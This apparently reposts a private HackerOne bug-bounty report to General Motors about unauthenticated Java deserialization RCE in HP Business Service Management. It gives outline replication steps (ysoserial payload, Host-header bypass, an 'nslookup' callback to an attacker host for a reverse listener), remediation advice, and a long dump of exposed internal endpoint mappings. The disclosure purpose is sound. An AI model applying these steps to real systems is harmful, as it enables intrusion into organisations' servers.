Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- cayce (cayce) 100 -
- Reputation Rank
- #212459 Multiple Critical Java deserialization vulnerabilities in HP's Big Data Product leads to unauthenticated RCE.
- State Informative (Closed)
- Reported To General Motors
- Scope
- Weakness Code Injection
- Severity Critical (9 ~ 10)
- Participants cayce cubo hackerone-support
- Visibility Private
- Collapse
- Summary by cayce: Tilting at Windmills
- Edit/Delete
- Title: Multiple Critical Java deserialization vulnerabilities in HP's Big Data Product leads to unauthenticated RCE.
- Weakness: Code Injection
- Severity: Critical
- Link: https://hackerone.com/reports/212459
- Date: 2017-03-11 03:23:47 +0000
- By: @cayce
- Details:
- Type:
- Java deserialization RCE
- Availability:
- HP Business Service Management
- /tvb/remoteProxy Servlet suffers from serialization injection attack.
- /bpi/remoteProxy Servlet suffers from serialization injection attack.
- Exploitability:
- Remotely exploitable by any user.
- Impact:
- Successful exploitation provides attacker the ability to perform remote code execution (RCE).
- With this RCE, attacker is able to deliver shell to the host and proceed to full root
- escalation (depending upon system hardening) and compromise of all logged (network,
- server, application and business) transaction monitored.
- Like WHOA!
- Steps to repeat:
- Replication:
- 1) Build groovy serialization payload with something like this:
- https://github.com/frohoff/ysoserial
- 2) Use payload in proxy/script/debugger to submit to server (These endpoint's are not initially publicly available but, a quick change to the "Host" header solved that. I guess there is a broken FW/WAF/IAM solution in the mix as well?
- 3) Harvest
- PoCs:
- (See attachment)
- Roots Causes:
- 1) This host CLEARY was deployed without reading the "Hardening Guide" from the vendor.
- The entire suite (it's BIG) deployed on the same node, o'Rly?
- 2) There must be issues with the change management process or the firewall technology used.
- There is no reason for this sadly deployed node to be publicly accessable.
- 3) Previously mentioned unnecessarily installed "Feature" receives unvalidated input from
- untrusted users.
- By sending a payload such as 'nslookup myhost.com', target will make the request to
- myhost.com. myhost.com can provide download/reverse listener via port 53. Escalation
- and elevation on going.
- Additional information:
- https://www.sans.org/security-resources/mistakes
- The Seven Worst Security Mistakes Senior Executives Make
- ****1: Assigning untrained people to maintain security and providing neither the training nor the time to make it possible to learn and do the job.****
- This is failure of 101s from the top down. I say this due to the choice to put all
- the orgs eggs in one "vendor centric" basket which, it's self has a gaping hole.
- Or ought I say, without a bottom because, that's a better picture of the service
- provided by the vendor/basket. Eggs go it for security yet, entire business profile
- becomes exposed for profit. One might ask for whom.
- ****2: Failing to understand the relationship of information security to the business problem-they understand physical security but do not see the consequences of poor information security.****
- Somebody spent AND made a LOT of money with all these top tier "Enterprise Grade"
- products yet, 101 security principles agreed upon for over two decades are ignored
- without consequence .
- ?3: Failing to deal with the operational aspects of security: making a few fixes and then not allowing the follow through necessary to ensure the problems stay fixed?
- We'll see this node will likely simply be firewalled, rebuilt or pulled offline but,
- there won't be sufficient policy change to prevent this in the future. Another
- "Enterprise Grade"/ISACA "Certified" product will be rolled out again in the near future,
- unhardened, without consequence.
- ****4: Relying primarily on a firewall.****
- Port 53, wowwie; your perimeter team just doesn't get it ... at all.
- ****5: Failing to realize how much money their information and organizational reputations are worth.****
- See response to mistake #2. THAT much money was spent to secure, must be valuable assets.
- ****6: Authorizing reactive, short-term fixes so problems re-emerge rapidly.****
- This is a must-have "Big Data" solution. Bad news, they don't EVER work when deployed
- without the guidance of an experienced (as in YEARS, OSes, PROTOCOLS, ENVIRONMENTS, BADNESS)
- system architect. I'm certain that was a line item from the vendor of this product. Did
- this org rely on internal expertise or maybe found another contractor to be able to pin
- the blame on?
- ****7: Pretending the problem will go away if they ignore it.****
- Nobody will get axed, just less of an unwarranted bonus. All of the charlatans
- that bought/sold/allowed/profited/created this mess will continue to do so.
- The Ten Worst Security Mistakes Information Technology People Make
- ****1: Connecting systems to the Internet before hardening them.****
- There's an "Administration Manual" as well as a "Hardening Guide" available from the vendor,
- someone ought read them. Not reference them, really just read them.
- ?2: Connecting test systems to the Internet with default accounts/passwords?
- TBD3: Failing to update systems when security holes are found.TBD
- ?4: Using telnet and other unencrypted protocols for managing systems, routers, firewalls, and PKI.?
- ?5: Giving users passwords over the phone or changing user passwords in response to telephone or personal requests when the requester is not authenticated.
- ?6: Failing to maintain and test backups.
- ****7: Running unnecessary services, especially ftpd, telnetd, finger, rpc, mail, rservices****
- Looks as though someone BLINDLY installed each and every downloadable installer available
- from the vendor download page. Are they truly ALL in use? Doubt it.
- ****8: Implementing firewalls with rules that don't stop malicious or dangerous traffic-incoming or outgoing.****
- ?9: Failing to implement or update virus detection software?
- ****10: Failing to educate users on what to look for and what to do when they see a potential security problem.?****
- I was not "shy" during my testing. There ought have been countless opportunities for
- the SOC team to identify and protect affected assets. They are certainly using the
- same vendor's product(s).
- ****And a bonus, number 11: Allowing untrained, uncertified people to take responsibility for securing important systems.****
- How many members of the Security team are contractors and how many are internal employees?
- What's the total years of modern, hand-on experience?
- There are countless writeups and CVEs to support in understanding this class of vulnerability.
- Here is one:
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- Steps toward remediation:
- a) Unplug this host. Acquire patches from vendor. Review "Hardening Guide". Rebuild
- from scratch and restore data backups as necessary. Review "Hardening Guide" again.
- Perform internal testing and monitoring. Reconsider purchase?
- b) All change control and perimeter policies ought be reviewed to be hardened to prevent
- access to internal nodes from untrusted external sources.
- c) Maintain an internal threat feed that includes vulnerability discoveries. Insure
- analysts read AND understand them. This is a two year old apocalypse attack. This is
- unsettling to say the least that.
- c) At the application layer, don't expose unnecessary services. If there is a business
- use case for them to be available, perform input validation on all exposed end-points.
- d) Stop buying security products you don't understand from vendors you can't trust
- and start spending money on what works, people and process.
- X) Get rid of the VERY expensive cookie cutter "Professional Services" consultants
- and hire some hackers, maybe even BUILD a team?
- Timeline:
- 2017-03-11 03:25:39 +0000: @cayce (comment)
- Host: vulnerable.host.gm.com
- HP Business Service Management (BSM) on production (prdm) segment.
- ---
- 2017-03-11 03:50:51 +0000: @cubo (bug triaged)
- Thank you for you submission. We are investigating your report with the GM security team. We value your submission and will respond shortly with our findings.
- ---
- 2017-03-11 05:06:45 +0000: @cayce (comment)
- For additional unauthenticated file/service enumeration, the endpoint "/jkstatus" is also exposed.
- ---
- 2017-03-11 05:24:30 +0000: @cayce (comment)
- JK Status Manager for vulnerable.host.gm.com:443
- Server Version: Apache/2.4.16 (Win32) OpenSSL/1.0.1p mod_jk/1.2.40 Server Time: Sat, 11 Mar 2017 00:22:49 Eastern Standard Time
- JK Version: mod_jk/1.2.40 Unix Seconds: 1489209769
- Start auto refresh (every
- 10
- seconds)
- |
- Change format
- [Read Only] [Dump] [S=Show only this worker, E=Edit worker, R=Reset worker state, T=Try worker recovery]
- Listing AJP Workers (4 Workers) [Hide]
- [S|E|R] Worker Status for localAjp
- Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
- ajp13 127.0.0.1 127.0.0.1:8009 0 0 0 0 2 0
- State Acc Err CE RE Wr Rd Busy Max Con LR LE
- OK 452336 (1/sec) 0 1040 0 117T (484M/sec) 769T (3.1G/sec) 1 19 28 254462 Sat, 18 Feb 2017 11:51:48 Eastern Standard Time
- URI Mappings for localAjp (378 maps) [Hide]
- Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
- internalsubsomain.was.here.gm.com:80 /bpi/jsps/bpi/admin/modeler/lib/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /*/static/modelExplorer/gwt/MeTreeService Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/gdeopenapi/services/GdeWsOpenAPI Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/RealTimeChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/DynamicChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /axis2/services/DiscoveryService/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/ProcessServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/PortalsServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/personalization/project/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/AllerezServer/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/GroupServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/AdminServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /axis2/services/UcmdbService/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/KpiServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/AdminCenter/servlets/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/services/technical/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/services/business/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/analytics/servlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/gwt/charts/gwt-log Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/omi/integration/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/slm/customers/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bam/open_api/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/BPM/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eum/BPRTransactionDefinitionServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/services/EntityNotificationPort Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eum/DownloadScriptServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /axis2/services/DiscoveryService Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eum/DownloadALMZipServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/j2ee/DataCollectorServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /uim/composition_manager/*_srv* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/BacRepositoriesUI/*.rep Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/personalization/project Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/gdeopenapi/GdeOpenApi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /axis2/services/UcmdbService Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eum/TCPReportServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/SnapshotServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/monitoring_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/dwrsitescopeodm/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/rca/rcaFrontComp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bam/*.bamNoProxy Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eumreportsapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/servicehealth/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/omi/integration Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bpr/BPRServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bam/BAMOpenApi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/slm/customers Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bsmservices/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/diagnostics/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/ldapContext/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/monitoring/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/BPM Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eumopenapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/dwrrunbook/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bpmappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/sitescope/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/eumappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /mercury/dynamic/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bsmLight/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bam/*.bam Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/tdm/*.tdm Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opal/uibridge/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/dwr-pi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/siebel/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/appmon/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/acweb/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opal/admin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/TMS/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/dwr/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opal/app/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/SLMGraphCallBackServletVer_41 Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/SymphonyRedirectionServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/OnlineDiagnosticServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/SLMGraphCallBackServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/authorizationmanagment Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/ColorsRetrieverServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/ConfigurationServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/kpiQueryServiceProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/VTContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/authorizationcontrol Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/PrismHandlerServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/JapaneseHelpServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /filters/CategoriesServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/VisualFlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/SLMCallbackServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/businessimpactapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/JavaScriptServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /filters/FiltersServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/CMSImagesServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/TopazSwitchboard Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/CallbackServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/SlmSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/LegendsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/isolateProblem Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-config-server/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/servicehealth Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/FlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /utility_portlets/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-admin-server/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /freshwater_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-cpdiff-tool/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bsmservices Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/ldapContext Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /mam-collectors/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /excite-runtime/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /SampleBrowser/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /TopazSettings/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bpmappapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/registerTV Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/download Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/bsmLight Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/gateway Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-console/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/kpiapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/slaapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/download Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/download Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /freshwater/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/upload Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /ucmdb-api/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/acweb Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/*.tac Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/upload Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/upload Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /webinfra/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/*.do Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /rumproxy/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-web/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /uim/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /tvb/*.do Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /excite/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /bpi/*.do Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-pm/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /qcbin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /OVPM/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /mcrs/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /ext/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /cm/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-config-server Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-admin-server Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-cpdiff-tool Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /excite-runtime Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-console Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-web Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /excite Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-pm Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /*.csv Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/jsps/bpi/admin/modeler/lib/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /*/static/modelExplorer/gwt/MeTreeService Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gdeopenapi/services/GdeWsOpenAPI Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/RealTimeChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/DynamicChartServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/DiscoveryService/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/ProcessServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
